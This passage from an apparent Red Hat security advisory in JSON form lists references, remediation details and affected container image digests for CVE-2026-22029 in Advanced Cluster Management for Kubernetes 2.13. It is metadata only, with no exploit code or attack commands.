"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "RHBZ#2428412",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428412"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22029",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx",
"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx"
}
],
"release_date": "2026-01-10T02:42:32.736000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
